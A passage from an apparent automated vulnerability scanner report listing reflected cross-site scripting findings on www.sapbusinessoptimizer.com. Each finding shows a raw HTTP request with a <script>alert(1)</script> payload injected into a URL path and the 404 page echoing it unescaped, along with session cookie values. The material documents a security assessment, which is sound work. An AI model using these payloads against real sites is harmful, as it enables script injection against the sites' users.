The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab7fe"><script>alert(1)</script>a5d7dab7a6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoab7fe"><script>alert(1)</script>a5d7dab7a6f HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; _pk_ref.6.52a4=1318692589.http%3A%2F%2Fburp%2Fshow%2F28; _pk_id.6.52a4=7b8ad9472e0c4cae.1318692589.1.1318692589.1318692589; _pk_ses.6.52a4=*

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 795
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/favicon.icoab7fe"><script>alert(1)</script>a5d7dab7a6f">
...[SNIP]...

3.94. http://www.sapbusinessoptimizer.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 18538<script>alert(1)</script>0816d580e57 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico18538<script>alert(1)</script>0816d580e57 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; _pk_ref.6.52a4=1318692589.http%3A%2F%2Fburp%2Fshow%2F28; _pk_id.6.52a4=7b8ad9472e0c4cae.1318692589.1.1318692589.1318692589; _pk_ses.6.52a4=*

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:45 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 791
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>0816d580e57">http://www.sapbusinessoptimizer.com/favicon.ico18538<script>alert(1)</script>0816d580e57</a>
...[SNIP]...

3.95. http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f27d4<script>alert(1)</script>9e1fbf305d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3Cf27d4<script>alert(1)</script>9e1fbf305d2/script%3Ea5d7dab7a6f HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _pk_ref.6.52a4=1318692589.http%3A%2F%2Fburp%2Fshow%2F28; PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; _pk_id.6.52a4=7b8ad9472e0c4cae.1318692589.1.1318692662.1318692589; _pk_ses.6.52a4=*

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:31:04 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 901
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>9e1fbf305d2/script%3Ea5d7dab7a6f">http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3Cf27d4<script>alert(1)</script>9e1fbf305d2/script%3Ea5d7dab7a6f</a>
...[SNIP]...

3.96. http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7c89"><script>alert(1)</script>713d58a2cd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3Ca7c89"><script>alert(1)</script>713d58a2cd2/script%3Ea5d7dab7a6f HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _pk_ref.6.52a4=1318692589.http%3A%2F%2Fburp%2Fshow%2F28; PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; _pk_id.6.52a4=7b8ad9472e0c4cae.1318692589.1.1318692662.1318692589; _pk_ses.6.52a4=*

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:31:04 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 905
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3Ca7c89"><script>alert(1)</script>713d58a2cd2/script%3Ea5d7dab7a6f">
...[SNIP]...

3.97. http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69a3a"><script>alert(1)</script>699ec413f8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f69a3a"><script>alert(1)</script>699ec413f8c HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _pk_ref.6.52a4=1318692589.http%3A%2F%2Fburp%2Fshow%2F28; PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; _pk_id.6.52a4=7b8ad9472e0c4cae.1318692589.1.1318692662.1318692589; _pk_ses.6.52a4=*

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:31:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 905
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f69a3a"><script>alert(1)</script>699ec413f8c">
...[SNIP]...

3.98. http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 86c22<script>alert(1)</script>99a0b1eb0e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f86c22<script>alert(1)</script>99a0b1eb0e3 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _pk_ref.6.52a4=1318692589.http%3A%2F%2Fburp%2Fshow%2F28; PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; _pk_id.6.52a4=7b8ad9472e0c4cae.1318692589.1.1318692662.1318692589; _pk_ses.6.52a4=*

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:31:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 901
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>99a0b1eb0e3">http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f86c22<script>alert(1)</script>99a0b1eb0e3</a>
...[SNIP]...

3.99. http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /fonts/SAPSans2007ExtraBoldCond.woff

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8acc2<script>alert(1)</script>01c7804de87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fonts8acc2<script>alert(1)</script>01c7804de87/SAPSans2007ExtraBoldCond.woff HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 839
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>01c7804de87/SAPSans2007ExtraBoldCond.woff">http://www.sapbusinessoptimizer.com/fonts8acc2<script>alert(1)</script>01c7804de87/SAPSans2007ExtraBoldCond.woff</a>
...[SNIP]...

3.100. http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /fonts/SAPSans2007ExtraBoldCond.woff

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a14ba"><script>alert(1)</script>01e6d48cacd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fontsa14ba"><script>alert(1)</script>01e6d48cacd/SAPSans2007ExtraBoldCond.woff HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:56 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 843
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/fontsa14ba"><script>alert(1)</script>01e6d48cacd/SAPSans2007ExtraBoldCond.woff">
...[SNIP]...

3.101. http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /fonts/SAPSans2007ExtraBoldCond.woff

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26a30<script>alert(1)</script>99080e416fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fonts/SAPSans2007ExtraBoldCond.woff26a30<script>alert(1)</script>99080e416fe HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 839
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>99080e416fe">http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff26a30<script>alert(1)</script>99080e416fe</a>
...[SNIP]...

3.102. http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /fonts/SAPSans2007ExtraBoldCond.woff

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c35b9"><script>alert(1)</script>cb0a464daf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fonts/SAPSans2007ExtraBoldCond.woffc35b9"><script>alert(1)</script>cb0a464daf0 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 843
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woffc35b9"><script>alert(1)</script>cb0a464daf0">
...[SNIP]...

3.103. http://www.sapbusinessoptimizer.com/js/swc/common.tao [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /js/swc/common.tao

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86654"><script>alert(1)</script>9a99eb8cf35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js86654"><script>alert(1)</script>9a99eb8cf35/swc/common.tao?v=2930 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:49 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 807
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/js86654"><script>alert(1)</script>9a99eb8cf35/swc/common.tao">
...[SNIP]...

3.104. http://www.sapbusinessoptimizer.com/js/swc/common.tao [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /js/swc/common.tao

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ff9f9<script>alert(1)</script>98e1be46692 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsff9f9<script>alert(1)</script>98e1be46692/swc/common.tao?v=2930 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 803
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>98e1be46692/swc/common.tao">http://www.sapbusinessoptimizer.com/jsff9f9<script>alert(1)</script>98e1be46692/swc/common.tao</a>
...[SNIP]...

3.105. http://www.sapbusinessoptimizer.com/js/swc/common.tao [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /js/swc/common.tao

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ded0b"><script>alert(1)</script>a2327f34e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/swcded0b"><script>alert(1)</script>a2327f34e3/common.tao?v=2930 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 805
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
<a href="http://www.sapbusinessoptimizer.com/js/swcded0b"><script>alert(1)</script>a2327f34e3/common.tao">
...[SNIP]...

3.106. http://www.sapbusinessoptimizer.com/js/swc/common.tao [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /js/swc/common.tao

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c2db3<script>alert(1)</script>2ad3d8843b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/swcc2db3<script>alert(1)</script>2ad3d8843b1/common.tao?v=2930 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 803
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>2ad3d8843b1/common.tao">http://www.sapbusinessoptimizer.com/js/swcc2db3<script>alert(1)</script>2ad3d8843b1/common.tao</a>
...[SNIP]...

3.107. http://www.sapbusinessoptimizer.com/js/swc/common.tao [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /js/swc/common.tao

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload abbb8<script>alert(1)</script>28ecfb46467 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/swc/common.taoabbb8<script>alert(1)</script>28ecfb46467?v=2930 HTTP/1.1
Host: www.sapbusinessoptimizer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a

Response

HTTP/1.1 404 Not Found
Date: Sat, 15 Oct 2011 15:29:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 803
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>Error: 404 - Page Not Found - error 404</title>
<style type="text/css">
body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser
...[SNIP]...
</script>28ecfb46467">http://www.sapbusinessoptimizer.com/js/swc/common.taoabbb8<script>alert(1)</script>28ecfb46467</a>
...[SNIP]...

3.108. http://www.sapbusinessoptimizer.com/js/swc/common.tao [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sapbusinessoptimizer.com
Path:   /js/swc/common.tao

